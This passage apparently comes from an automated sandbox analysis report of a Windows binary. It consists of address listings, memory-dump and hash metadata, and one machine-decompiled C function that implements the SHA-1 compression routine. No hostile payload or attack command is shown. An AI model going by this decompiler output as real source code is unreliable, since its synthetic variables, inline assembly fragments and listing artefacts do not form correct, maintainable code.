                0x00cb729c
                0x00cb72a2
                0x00cb72a7
                0x00cb72ab
                0x00cb72b1
                0x00cb72ba
                0x00cb72bd
                0x00cb72bd
                0x00cb72bd
                0x00000000
                0x00cb7158
                0x00cb7158
                0x00cb715a
                0x00000000
                0x00000000
                0x00cb7160
                0x00cb7166
                0x00cb7169
                0x00cb716f
                0x00cb7173
                0x00cb7176
                0x00cb717a
                0x00cb71c5
                0x00cb71c8
                0x00000000
                0x00000000
                0x00cb71cc
                0x00cb71cc
                0x00cb71cf
                0x00cb71d3
                0x00cb71d5
                0x00cb71d9
                0x00cb71de
                0x00cb71e2
                0x00cb71e5
                0x00cb71e8
                0x00cb71eb
                0x00cb71ee
                0x00cb71f2
                0x00cb71f2
                0x00cb71f2
                0x00000000
                0x00cb71d5
                0x00cb717c
                0x00cb717f
                0x00000000
                0x00000000
                0x00cb7183
                0x00cb7183
                0x00cb7186
                0x00cb7189
                0x00cb718c
                0x00cb7191
                0x00cb7197
                0x00cb719d
                0x00cb71a3
                0x00cb71a9
                0x00cb71af
                0x00cb71b2
                0x00cb71b5
                0x00cb71b8
                0x00cb71bb
                0x00cb71be
                0x00cb71be
                0x00cb71be
                0x00000000
                0x00cb71c3
                0x00cb6fdc
                0x00cb6fdc
                0x00cb6fdf
                0x00cb70da
                0x00cb70e3
                0x00cb70ed
                0x00cb70f1
                0x00cb70fa
                0x00cb70fd
                0x00cb70fd
                0x00cb7100
                0x00cb7103
                0x00cb7103
                0x00000000
                0x00cb7103
                0x00cb6fe5
                0x00cb701b
                0x00cb6fe7
                0x00cb6fea
                0x00cb6fef
                0x00cb6ff7
                0x00cb6fff
                0x00cb7002
                0x00cb700a
                0x00cb7011
                0x00cb7016
                0x00cb7016
                0x00cb7020
                0x00cb7027
                0x00cb702d
                0x00cb7033
                0x00cb703a
                0x00cb7068
                0x00cb7069
                0x00cb706a
                0x00cb706e
                0x00cb7070
                0x00cb708e
                0x00cb7091
                0x00cb709d
                0x00cb70a0
                0x00cb70a4
                0x00cb70a9
                0x00cb70bc
                0x00cb70be
                0x00cb70c4
                0x00cb70c6
                0x00cb70c6
                0x00cb70c8
                0x00000000
                0x00cb70c8
                0x00cb7078
                0x00cb707b
                0x00cb707b
                0x00cb707d
                0x00000000
                0x00000000
                0x00cb707f
                0x00cb7080
                0x00cb7083
                0x00cb7086
                0x00000000
                0x00000000
                0x00000000
                0x00cb7088
                0x00cb708a
                0x00000000
                0x00cb703c
                0x00cb703e
                0x00cb7041
                0x00cb704b
                0x00cb7053
                0x00cb7059
                0x00cb705c
                0x00cb70d0
                0x00cb70d3
                0x00000000
                0x00cb70d3
                0x00cb703a
                0x00cb6fd6
                0x00cb6f1e
                0x00cb6e97
                0x00cb6e9a
                0x00cb6e9a
                0x00cb6e9a
                0x00000000
                0x00cb6e9a
                0x00cb6e3b
                0x00cb6e3e
                0x00cb6e3e
                0x00cb6e40
                0x00000000
                0x00000000
                0x00cb6e42
                0x00cb6e43
                0x00cb6e46
                0x00cb6e49
                0x00000000
                0x00000000
                0x00000000
                0x00cb6e4b
                0x00cb6e4d
                0x00000000
                0x00cb6e4d
                0x00cb6dfc
                0x00cb6dff
                0x00cb6e09
                0x00cb6e11
                0x00cb6e17
                0x00cb6e1a
                0x00cb6e1d
                0x00000000
                0x00cb6e1d
                0x00cb6daa
                0x00cb6dad
                0x00000000
                0x00000000
                0x00cb6db1
                0x00cb6dbc
                0x00cb6dc2
                0x00cb764b
                0x00cb764b
                0x00000000
                0x00cb764b
                0x00cb6dc8
                0x00000000
                0x00000000
                0x00cb6dd0
                0x00cb6dd6
                0x00000000
                0x00000000
                0x00000000
                0x00cb6dd6
                0x00cb6d52
                0x00cb6d1e
                0x00cb6cef
                0x00cb6cf3
                0x00cb6cf7
                0x00cb6cfb
                0x00cb6d03
                0x00000000
                0x00000000
                0x00000000

                Memory Dump Source
                • Source File: 00000000.00000002.333693439.0000000000CA1000.00000020.00020000.sdmp, Offset: 00CA0000, based on PE: true
                • Associated: 00000000.00000002.333689500.0000000000CA0000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.333717935.0000000000CD2000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.333726734.0000000000CDD000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333732087.0000000000CE4000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333738140.0000000000D00000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333742425.0000000000D01000.00000002.00020000.sdmp Download File
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 807f214746869600fdd18866b4149cd4aafbd92bc6957c1dafb80c3f5aedf6e6
                • Instruction ID: af45a7816f782e8e7d56931b0294614404ec750e46000f58d2cbc648868cb373
                • Opcode Fuzzy Hash: 807f214746869600fdd18866b4149cd4aafbd92bc6957c1dafb80c3f5aedf6e6
                • Instruction Fuzzy Hash: F062F4706087869FC719CF38C8905F9BBE1BB95304F14866EE8AA8B741D734EA56CB50
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00CAE973, Relevance: .7, Instructions: 694COMMONCrypto
                Download Yara Rule
                C-Code - Quality: 70%
                			E00CAE973(signed int* _a4, signed int _a8, signed int _a12, signed int _a16) {
				signed int _v4;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int* _v20;
				signed int _v24;
				signed int _v28;
				signed int _t429;
				intOrPtr _t431;
				intOrPtr _t436;
				void* _t441;
				intOrPtr _t443;
				signed int _t446;
				void* _t448;
				signed int _t454;
				signed int _t460;
				signed int _t466;
				signed int _t474;
				signed int _t482;
				signed int _t489;
				signed int _t512;
				signed int _t519;
				signed int _t526;
				signed int _t546;
				signed int _t555;
				signed int _t564;
				signed int* _t592;
				signed int _t593;
				signed int _t595;
				signed int _t596;
				signed int* _t597;
				signed int _t598;
				signed int _t599;
				signed int _t601;
				signed int _t603;
				signed int _t604;
				signed int* _t605;
				signed int _t606;
				signed int* _t670;
				signed int* _t741;
				signed int _t752;
				signed int _t769;
				signed int _t773;
				signed int _t777;
				signed int _t781;
				signed int _t782;
				signed int _t786;
				signed int _t787;
				signed int _t791;
				signed int _t796;
				signed int _t800;
				signed int _t804;
				signed int _t806;
				signed int _t809;
				signed int _t810;
				signed int* _t811;
				signed int _t814;
				signed int _t815;
				signed int _t816;
				signed int _t820;
				signed int _t821;
				signed int _t825;
				signed int _t830;
				signed int _t834;
				signed int _t838;
				signed int* _t839;
				signed int _t841;
				signed int _t842;
				signed int _t844;
				signed int _t845;
				signed int _t847;
				signed int* _t848;
				signed int _t851;
				signed int* _t854;
				signed int _t855;
				signed int _t857;
				signed int _t858;
				signed int _t862;
				signed int _t863;
				signed int _t867;
				signed int _t871;
				signed int _t875;
				signed int _t879;
				signed int _t880;
				signed int* _t881;
				signed int _t882;
				signed int _t884;
				signed int _t885;
				signed int _t886;
				signed int _t887;
				signed int _t888;
				signed int _t890;
				signed int _t891;
				signed int _t893;
				signed int _t894;
				signed int _t896;
				signed int _t897;
				signed int* _t898;
				signed int _t899;
				signed int _t901;
				signed int _t902;
				signed int _t904;
				signed int _t905;

				_t906 =  &_v28;
				if(_a16 == 0) {
					_t839 = _a8;
					_v20 = _t839;
					E00CBEA80(_t839, _a12, 0x40);
					_t906 =  &(( &_v28)[3]);
				} else {
					_t839 = _a12;
					_v20 = _t839;
				}
				_t848 = _a4;
				_t593 =  *_t848;
				_t886 = _t848[1];
				_a12 = _t848[2];
				_a16 = _t848[3];
				_v24 = 0;
				_t429 = E00CC5604( *_t839);
				asm("rol edx, 0x5");
				 *_t839 = _t429;
				_t851 = _t848[4] + 0x5a827999 + ((_a16 ^ _a12) & _t886 ^ _a16) + _t593 + _t429;
				_t430 = _t839;
				asm("ror ebp, 0x2");
				_v16 = _t839;
				_a8 =  &(_t839[3]);
				do {
					_t431 = E00CC5604(_t430[1]);
					asm("rol edx, 0x5");
					 *((intOrPtr*)(_v16 + 4)) = _t431;
					asm("ror ebx, 0x2");
					_a16 = _a16 + 0x5a827999 + ((_a12 ^ _t886) & _t593 ^ _a12) + _t851 + _t431;
					_t436 = E00CC5604( *((intOrPtr*)(_a8 - 4)));
					asm("rol edx, 0x5");
					 *((intOrPtr*)(_a8 - 4)) = _t436;
					asm("ror esi, 0x2");
					_a12 = _a12 + 0x5a827999 + ((_t886 ^ _t593) & _t851 ^ _t886) + _a16 + _t436;
					_t441 = E00CC5604( *_a8);
					asm("rol edx, 0x5");
					 *_a8 = _t441;
					asm("ror dword [esp+0x48], 0x2");
					_t886 = _t886 + ((_t851 ^ _t593) & _a16 ^ _t593) + _a12 + 0x5a827999 + _t441;
					_t443 = E00CC5604( *((intOrPtr*)(_a8 + 4)));
					_a8 = _a8 + 0x14;
					asm("rol edx, 0x5");
					 *((intOrPtr*)(_a8 + 4)) = _t443;
					_t446 = _v24 + 5;
					asm("ror dword [esp+0x48], 0x2");
					_v24 = _t446;
					_t593 = _t593 + ((_t851 ^ _a16) & _a12 ^ _t851) + _t886 + _t443 + 0x5a827999;
					_v16 =  &(_t839[_t446]);
					_t448 = E00CC5604(_t839[_t446]);
					_t906 =  &(_t906[5]);
					asm("rol edx, 0x5");
					 *_v16 = _t448;
					_t430 = _v16;
					asm("ror ebp, 0x2");
					_t851 = _t851 + 0x5a827999 + ((_a16 ^ _a12) & _t886 ^ _a16) + _t593 + _t448;
				} while (_v24 != 0xf);
				_t769 = _t839[0xd] ^ _t839[8] ^ _t839[2] ^  *_t839;
				asm("rol edx, 1");
				asm("rol ecx, 0x5");
				 *_t839 = _t769;
				_t454 = ((_a12 ^ _t886) & _t593 ^ _a12) + _t851 + _t769 + _a16 + 0x5a827999;
				_t773 = _t839[0xe] ^ _t839[9] ^ _t839[3] ^ _t839[1];
				_a16 = _t454;
				asm("rol edx, 1");
				asm("rol ecx, 0x5");
				asm("ror ebx, 0x2");
				_t839[1] = _t773;
				_t777 = _t839[0xf] ^ _t839[0xa] ^ _t839[4] ^ _t839[2];
				_t460 = ((_t886 ^ _t593) & _t851 ^ _t886) + _t454 + _t773 + _a12 + 0x5a827999;
				asm("ror esi, 0x2");
				_a8 = _t460;
				asm("rol edx, 1");
				asm("rol ecx, 0x5");
				_t839[2] = _t777;
				_t466 = ((_t851 ^ _t593) & _a16 ^ _t593) + _t460 + 0x5a827999 + _t777 + _t886;
				_t887 = _a16;
				_t781 = _t839[0xb] ^ _t839[5] ^ _t839[3] ^  *_t839;
				_v28 = _t466;
				asm("ror ebp, 0x2");
				_a16 = _t887;
				_t888 = _a8;
				asm("rol edx, 1");
				asm("rol ecx, 0x5");
				_t839[3] = _t781;
				asm("ror ebp, 0x2");
				_t782 = 0x11;
				_a12 = ((_t851 ^ _t887) & _t888 ^ _t851) + 0x5a827999 + _t466 + _t781 + _t593;
				_a8 = _t888;
				_v16 = _t782;
				do {
					_t89 = _t782 + 5; // 0x16
					_t474 = _t89;
					_v8 = _t474;
					_t91 = _t782 - 5; // 0xc
					_t92 = _t782 + 3; // 0x14
					_t890 = _t92 & 0x0000000f;
					_t595 = _t474 & 0x0000000f;
					_v12 = _t890;
					_t786 = _t839[_t91 & 0x0000000f] ^ _t839[_t782 & 0x0000000f] ^ _t839[_t595] ^ _t839[_t890];
					asm("rol edx, 1");
					_t839[_t890] = _t786;
					_t891 = _v28;
					asm("rol ecx, 0x5");
					asm("ror ebp, 0x2");
					_v28 = _t891;
					_t482 = _v16;
					_v24 = _t851 + (_a16 ^ _a8 ^ _t891) + 0x6ed9eba1 + _a12 + _t786;
					_t854 = _v20;
					_t787 = 0xf;
					_t841 = _t482 + 0x00000006 & _t787;
					_t893 = _t482 + 0x00000004 & _t787;
					_t791 =  *(_t854 + (_t482 - 0x00000004 & _t787) * 4) ^  *(_t854 + (_t482 + 0x00000001 & _t787) * 4) ^  *(_t854 + _t893 * 4) ^  *(_t854 + _t841 * 4);
					asm("rol edx, 1");
					 *(_t854 + _t893 * 4) = _t791;
					_t855 = _a12;
					asm("rol ecx, 0x5");
					asm("ror esi, 0x2");
					_a12 = _t855;
					_t489 = _v16;
					_a16 = _a16 + 0x6ed9eba1 + (_a8 ^ _v28 ^ _t855) + _v24 + _t791;
					_t857 = _t489 + 0x00000007 & 0x0000000f;
					_t670 = _v20;
					_t796 = _v20[_t489 - 0x00000003 & 0x0000000f] ^  *(_t670 + (_t489 + 0x00000002 & 0x0000000f) * 4) ^  *(_t670 + _t595 * 4) ^  *(_t670 + _t857 * 4);
					asm("rol edx, 1");
					 *(_t670 + _t595 * 4) = _t796;
					_t596 = _v24;
					asm("rol ecx, 0x5");
					asm("ror ebx, 0x2");
					_v24 = _t596;
					_t597 = _v20;
					_a8 = _a8 + 0x6ed9eba1 + (_t596 ^ _v28 ^ _a12) + _a16 + _t796;
					asm("rol ecx, 0x5");
					_t800 =  *(_t597 + (_v16 - 0x00000008 & 0x0000000f) * 4) ^  *(_t597 + (_v16 + 0xfffffffe & 0x0000000f) * 4) ^  *(_t597 + _t841 * 4) ^  *(_t597 + _v12 * 4);
					asm("rol edx, 1");
					 *(_t597 + _t841 * 4) = _t800;
					_t598 = _a16;
					_t839 = _v20;
					asm("ror ebx, 0x2");
					_a16 = _t598;
					_v28 = _v28 + 0x6ed9eba1 + (_v24 ^ _t598 ^ _a12) + _a8 + _t800;
					_t804 = _t839[_v16 - 0x00000007 & 0x0000000f] ^ _t839[_v16 - 0x00000001 & 0x0000000f] ^ _t839[_t893] ^ _t839[_t857];
					_t894 = _a8;
					asm("rol edx, 1");
					_t839[_t857] = _t804;
					_t851 = _v24;
					asm("rol ecx, 0x5");
					_t782 = _v8;
					asm("ror ebp, 0x2");
					_a8 = _t894;
					_a12 = _a12 + 0x6ed9eba1 + (_t851 ^ _t598 ^ _t894) + _v28 + _t804;
					_v16 = _t782;
				} while (_t782 + 3 <= 0x23);
				_t858 = 0x25;
				_v16 = _t858;
				while(1) {
					_t199 = _t858 + 5; // 0x2a
					_t512 = _t199;
					_t200 = _t858 - 5; // 0x20
					_v4 = _t512;
					_t202 = _t858 + 3; // 0x28
					_t806 = _t202 & 0x0000000f;
					_v8 = _t806;
					_t896 = _t512 & 0x0000000f;
					_t862 = _t839[_t200 & 0x0000000f] ^ _t839[_t858 & 0x0000000f] ^ _t839[_t806] ^ _t839[_t896];
					asm("rol esi, 1");
					_t599 = _v28;
					_t839[_t806] = _t862;
					asm("rol edx, 0x5");
					asm("ror ebx, 0x2");
					_t863 = 0xf;
					_v28 = _t599;
					_v24 = _a12 - 0x70e44324 + ((_a8 | _v28) & _t598 | _a8 & _t599) + _t862 + _v24;
					_t519 = _v16;
					_t601 = _t519 + 0x00000006 & _t863;
					_t809 = _t519 + 0x00000004 & _t863;
					_v12 = _t809;
					_t867 = _t839[_t519 - 0x00000004 & _t863] ^ _t839[_t519 + 0x00000001 & _t863] ^ _t839[_t809] ^ _t839[_t601];
					asm("rol esi, 1");
					_t839[_t809] = _t867;
					_t842 = _a12;
					_t810 = _v24;
					asm("rol edx, 0x5");
					asm("ror edi, 0x2");
					_a12 = _t842;
					_t243 = _t810 - 0x70e44324; // -1894007573
					_t811 = _v20;
					_a16 = _t243 + ((_v28 | _t842) & _a8 | _v28 & _t842) + _t867 + _a16;
					_t526 = _v16;
					_t844 = _t526 + 0x00000007 & 0x0000000f;
					_t871 =  *(_t811 + (_t526 - 0x00000003 & 0x0000000f) * 4) ^  *(_t811 + (_t526 + 0x00000002 & 0x0000000f) * 4) ^  *(_t811 + _t844 * 4) ^  *(_t811 + _t896 * 4);
					asm("rol esi, 1");
					 *(_t811 + _t896 * 4) = _t871;
					_t897 = _v24;
					asm("rol edx, 0x5");
					asm("ror ebp, 0x2");
					_t814 = _a16 + 0x8f1bbcdc + ((_t897 | _a12) & _v28 | _t897 & _a12) + _t871 + _a8;
					_v24 = _t897;
					_t898 = _v20;
					_a8 = _t814;
					asm("rol edx, 0x5");
					_t875 =  *(_t898 + (_v16 - 0x00000008 & 0x0000000f) * 4) ^  *(_t898 + (_v16 + 0xfffffffe & 0x0000000f) * 4) ^  *(_t898 + _v8 * 4) ^  *(_t898 + _t601 * 4);
					asm("rol esi, 1");
					 *(_t898 + _t601 * 4) = _t875;
					_t598 = _a16;
					asm("ror ebx, 0x2");
					_a16 = _t598;
					_t815 = _t814 + ((_v24 | _t598) & _a12 | _v24 & _t598) + 0x8f1bbcdc + _t875 + _v28;
					_v28 = _t815;
					asm("rol edx, 0x5");
					_t879 =  *(_t898 + (_v16 - 0x00000007 & 0x0000000f) * 4) ^  *(_t898 + (_v16 - 0x00000001 & 0x0000000f) * 4) ^  *(_t898 + _t844 * 4) ^  *(_t898 + _v12 * 4);
					asm("rol esi, 1");
					 *(_t898 + _t844 * 4) = _t879;
					_t899 = _a8;
					_t845 = _v24;
					asm("ror ebp, 0x2");
					_a8 = _t899;
					_t858 = _v4;
					_a12 = _t815 - 0x70e44324 + ((_t598 | _t899) & _t845 | _t598 & _t899) + _t879 + _a12;
					_v16 = _t858;
					if(_t858 + 3 > 0x37) {
						break;
					}
					_t839 = _v20;
				}
				_t816 = 0x39;
				_v16 = _t816;
				do {
					_t310 = _t816 + 5; // 0x3e
					_t546 = _t310;
					_v8 = _t546;
					_t312 = _t816 + 3; // 0x3c
					_t313 = _t816 - 5; // 0x34
					_t880 = 0xf;
					_t901 = _t312 & _t880;
					_t603 = _t546 & _t880;
					_t881 = _v20;
					_v4 = _t901;
					_t820 =  *(_t881 + (_t313 & _t880) * 4) ^  *(_t881 + (_t816 & _t880) * 4) ^  *(_t881 + _t603 * 4) ^  *(_t881 + _t901 * 4);
					asm("rol edx, 1");
					 *(_t881 + _t901 * 4) = _t820;
					_t902 = _v28;
					asm("rol ecx, 0x5");
					asm("ror ebp, 0x2");
					_v28 = _t902;
					_v24 = (_a16 ^ _a8 ^ _t902) + _t820 + _t845 + _a12 + 0xca62c1d6;
					_t555 = _v16;
					_t821 = 0xf;
					_t847 = _t555 + 0x00000006 & _t821;
					_t904 = _t555 + 0x00000004 & _t821;
					_t825 =  *(_t881 + (_t555 - 0x00000004 & _t821) * 4) ^  *(_t881 + (_t555 + 0x00000001 & _t821) * 4) ^  *(_t881 + _t904 * 4) ^  *(_t881 + _t847 * 4);
					asm("rol edx, 1");
					 *(_t881 + _t904 * 4) = _t825;
					_t882 = _a12;
					asm("rol ecx, 0x5");
					_a16 = (_a8 ^ _v28 ^ _t882) + _t825 + _a16 + _v24 + 0xca62c1d6;
					_t564 = _v16;
					asm("ror esi, 0x2");
					_a12 = _t882;
					_t884 = _t564 + 0x00000007 & 0x0000000f;
					_t741 = _v20;
					_t830 = _v20[_t564 - 0x00000003 & 0x0000000f] ^  *(_t741 + (_t564 + 0x00000002 & 0x0000000f) * 4) ^  *(_t741 + _t603 * 4) ^  *(_t741 + _t884 * 4);
					asm("rol edx, 1");
					 *(_t741 + _t603 * 4) = _t830;
					_t604 = _v24;
					asm("rol ecx, 0x5");
					asm("ror ebx, 0x2");
					_v24 = _t604;
					_t605 = _v20;
					_a8 = (_t604 ^ _v28 ^ _a12) + _t830 + _a8 + _a16 + 0xca62c1d6;
					asm("rol ecx, 0x5");
					_t834 = _t605[_v16 - 0x00000008 & 0x0000000f] ^ _t605[_v16 + 0xfffffffe & 0x0000000f] ^ _t605[_t847] ^ _t605[_v4];
					asm("rol edx, 1");
					_t605[_t847] = _t834;
					_t845 = _v24;
					asm("ror dword [esp+0x3c], 0x2");
					_v28 = (_t845 ^ _a16 ^ _a12) + _t834 + _v28 + _a8 + 0xca62c1d6;
					_t838 = _t605[_v16 - 0x00000007 & 0x0000000f] ^ _t605[_v16 - 0x00000001 & 0x0000000f] ^ _t605[_t904] ^ _t605[_t884];
					_t905 = _a8;
					asm("rol edx, 1");
					_t605[_t884] = _t838;
					_t606 = _a16;
					_t885 = _v28;
					asm("ror ebp, 0x2");
					_t816 = _v8;
					asm("rol ecx, 0x5");
					_a8 = _t905;
					_t752 = _t885 + 0xca62c1d6 + (_t845 ^ _t606 ^ _t905) + _t838 + _a12;
					_v16 = _t816;
					_a12 = _t752;
				} while (_t816 + 3 <= 0x4b);
				_t592 = _a4;
				_t592[1] = _t592[1] + _t885;
				_t592[2] = _t592[2] + _t905;
				_t592[3] = _t592[3] + _t606;
				 *_t592 =  *_t592 + _t752;
				_t592[4] = _t592[4] + _t845;
				return _t592;
			}










































































































                0x00cae973
                0x00cae97f
                0x00cae98b
                0x00cae995
                0x00cae99a
                0x00cae99f
                0x00cae981
                0x00cae981
                0x00cae985
                0x00cae985
                0x00cae9a2
                0x00cae9ab
                0x00cae9ad
                0x00cae9b0
                0x00cae9ba
                0x00cae9c0
                0x00cae9c4
                0x00cae9dc
                0x00cae9e7
                0x00cae9e9
                0x00cae9eb
                0x00cae9f0
                0x00cae9f3
                0x00cae9f7
                0x00cae9fb
                0x00cae9fe
                0x00caea09
                0x00caea0e
                0x00caea28
                0x00caea2d
                0x00caea38
                0x00caea45
                0x00caea4a
                0x00caea5e
                0x00caea65
                0x00caea6f
                0x00caea7c
                0x00caea85
                0x00caea95
                0x00caeaa1
                0x00caeaa3
                0x00caeaae
                0x00caeab3
                0x00caeab6
                0x00caeaca
                0x00caead1
                0x00caead8
                0x00caeae1
                0x00caeae5
                0x00caeae9
                0x00caeaf4
                0x00caeaf7
                0x00caeafa
                0x00caeb06
                0x00caeb18
                0x00caeb1b
                0x00caeb1d
                0x00caeb33
                0x00caeb3b
                0x00caeb3f
                0x00caeb4a
                0x00caeb5c
                0x00caeb63
                0x00caeb66
                0x00caeb6c
                0x00caeb6e
                0x00caeb73
                0x00caeb78
                0x00caeb8e
                0x00caeb97
                0x00caeb99
                0x00caeb9c
                0x00caeba2
                0x00caeba8
                0x00caebb7
                0x00caebc7
                0x00caebc9
                0x00caebcf
                0x00caebd1
                0x00caebd7
                0x00caebdc
                0x00caebe0
                0x00caebe6
                0x00caebea
                0x00caebf4
                0x00caebfb
                0x00caec00
                0x00caec01
                0x00caec05
                0x00caec09
                0x00caec0d
                0x00caec0d
                0x00caec0d
                0x00caec12
                0x00caec16
                0x00caec1e
                0x00caec24
                0x00caec27
                0x00caec2a
                0x00caec39
                0x00caec48
                0x00caec4a
                0x00caec4d
                0x00caec53
                0x00caec5d
                0x00caec62
                0x00caec68
                0x00caec6c
                0x00caec70
                0x00caec74
                0x00caec78
                0x00caec7d
                0x00caec90
                0x00caec9f
                0x00caeca1
                0x00caeca4
                0x00caecaa
                0x00caecaf
                0x00caecc2
                0x00caecc8
                0x00caeccc
                0x00caecdc
                0x00caece5
                0x00caecef
                0x00caecf2
                0x00caecf4
                0x00caecfb
                0x00caed01
                0x00caed10
                0x00caed1d
                0x00caed23
                0x00caed2b
                0x00caed4c
                0x00caed4f
                0x00caed56
                0x00caed5a
                0x00caed5d
                0x00caed67
                0x00caed77
                0x00caed7c
                0x00caed84
                0x00caed9b
                0x00caeda2
                0x00caeda6
                0x00caeda8
                0x00caedab
                0x00caedb1
                0x00caedba
                0x00caedca
                0x00caedcf
                0x00caedd6
                0x00caedda
                0x00caedde
                0x00caede9
                0x00caedea
                0x00caedf4
                0x00caedf4
                0x00caedf4
                0x00caedf7
                0x00caedfa
                0x00caee01
                0x00caee06
                0x00caee0b
                0x00caee12
                0x00caee20
                0x00caee2f
                0x00caee31
                0x00caee37
                0x00caee46
                0x00caee49
                0x00caee4c
                0x00caee4d
                0x00caee59
                0x00caee5d
                0x00caee67
                0x00caee69
                0x00caee70
                0x00caee80
                0x00caee89
                0x00caee8b
                0x00caee8e
                0x00caee9a
                0x00caeea2
                0x00caeea9
                0x00caeeac
                0x00caeeb0
                0x00caeeb6
                0x00caeebc
                0x00caeec0
                0x00caeed0
                0x00caeedf
                0x00caeee2
                0x00caeee4
                0x00caeee7
                0x00caef0b
                0x00caef14
                0x00caef17
                0x00caef19
                0x00caef1d
                0x00caef27
                0x00caef2e
                0x00caef44
                0x00caef4e
                0x00caef50
                0x00caef54
                0x00caef62
                0x00caef71
                0x00caef79
                0x00caef7e
                0x00caef85
                0x00caef9e
                0x00caefa4
                0x00caefa6
                0x00caefaa
                0x00caefb0
                0x00caefb8
                0x00caefbd
                0x00caefcd
                0x00caefd3
                0x00caefd7
                0x00caefe1
                0x00000000
                0x00000000
                0x00caedf0
                0x00caedf0
                0x00caefe9
                0x00caefea
                0x00caefee
                0x00caefee
                0x00caefee
                0x00caeff3
                0x00caeff7
                0x00caeffc
                0x00caf001
                0x00caf006
                0x00caf008
                0x00caf00a
                0x00caf00e
                0x00caf01d
                0x00caf02c
                0x00caf02e
                0x00caf031
                0x00caf039
                0x00caf03e
                0x00caf047
                0x00caf04d
                0x00caf051
                0x00caf055
                0x00caf05c
                0x00caf05e
                0x00caf071
                0x00caf080
                0x00caf082
                0x00caf085
                0x00caf08d
                0x00caf0a0
                0x00caf0a4
                0x00caf0a8
                0x00caf0ab
                0x00caf0bb
                0x00caf0c4
                0x00caf0ce
                0x00caf0d1
                0x00caf0d3
                0x00caf0da
                0x00caf0de
                0x00caf0f3
                0x00caf0fc
                0x00caf100
                0x00caf104
                0x00caf129
                0x00caf132
                0x00caf135
                0x00caf137
                0x00caf13a
                0x00caf148
                0x00caf155
                0x00caf172
                0x00caf175
                0x00caf179
                0x00caf17b
                0x00caf17e
                0x00caf184
                0x00caf18c
                0x00caf195
                0x00caf199
                0x00caf1a2
                0x00caf1a6
                0x00caf1a8
                0x00caf1af
                0x00caf1b3
                0x00caf1bc
                0x00caf1c0
                0x00caf1c3
                0x00caf1c6
                0x00caf1c9
                0x00caf1cb
                0x00caf1d5

                Memory Dump Source
                • Source File: 00000000.00000002.333693439.0000000000CA1000.00000020.00020000.sdmp, Offset: 00CA0000, based on PE: true
                • Associated: 00000000.00000002.333689500.0000000000CA0000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.333717935.0000000000CD2000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.333726734.0000000000CDD000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333732087.0000000000CE4000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333738140.0000000000D00000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333742425.0000000000D01000.00000002.00020000.sdmp Download File
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 21433a5f7de97874b167784364e9de3bea179284053d1adb041105bdc07d2dba
                • Instruction ID: a2939deb62a2cc7ece77bc70aad074405e9257bb5501ce8b956a79947bb079fa
                • Opcode Fuzzy Hash: 21433a5f7de97874b167784364e9de3bea179284053d1adb041105bdc07d2dba
                • Instruction Fuzzy Hash: 055248B26087019FC758CF19C891A6AF7E1FFC8304F49892DF9968B255D334E919CB82
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00CB66A2, Relevance: .5, Instructions: 509COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000000.00000002.333693439.0000000000CA1000.00000020.00020000.sdmp, Offset: 00CA0000, based on PE: true
                • Associated: 00000000.00000002.333689500.0000000000CA0000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.333717935.0000000000CD2000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.333726734.0000000000CDD000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333732087.0000000000CE4000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333738140.0000000000D00000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333742425.0000000000D01000.00000002.00020000.sdmp Download File
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 975e6b111a921778b326de67010aaed70447f77de749b209956d4b15a12836c2
                • Instruction ID: b3746060d6b7b8979496bd7d1f4980f0aa43bfee42581db8374db42899944a9c
                • Opcode Fuzzy Hash: 975e6b111a921778b326de67010aaed70447f77de749b209956d4b15a12836c2
                • Instruction Fuzzy Hash: 9012D3B16047068FCB28DF28C9D06B9B7E0FF54308F14892EE5A7C7A80D778A995DB45
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00CABAD1, Relevance: .4, Instructions: 449COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000000.00000002.333693439.0000000000CA1000.00000020.00020000.sdmp, Offset: 00CA0000, based on PE: true
                • Associated: 00000000.00000002.333689500.0000000000CA0000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.333717935.0000000000CD2000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.333726734.0000000000CDD000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333732087.0000000000CE4000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333738140.0000000000D00000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333742425.0000000000D01000.00000002.00020000.sdmp Download File
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 4da09fb357c655493c89263800c40d9016b7b375c22aa6b8f2b8aedee94de093
                • Instruction ID: cf86bdb011ad1c2662ba57be2e8d8745ed2c78383e729e545e00b05c744d9dce
                • Opcode Fuzzy Hash: 4da09fb357c655493c89263800c40d9016b7b375c22aa6b8f2b8aedee94de093
                • Instruction Fuzzy Hash: D5F16871A083468FC714CF29C484A6ABBE2FFCA358F144A2EF49597356D730ED468B52
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00CC0113, Relevance: .3, Instructions: 345COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000000.00000002.333693439.0000000000CA1000.00000020.00020000.sdmp, Offset: 00CA0000, based on PE: true
                • Associated: 00000000.00000002.333689500.0000000000CA0000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.333717935.0000000000CD2000.00000002.00020000.sdmp Download File
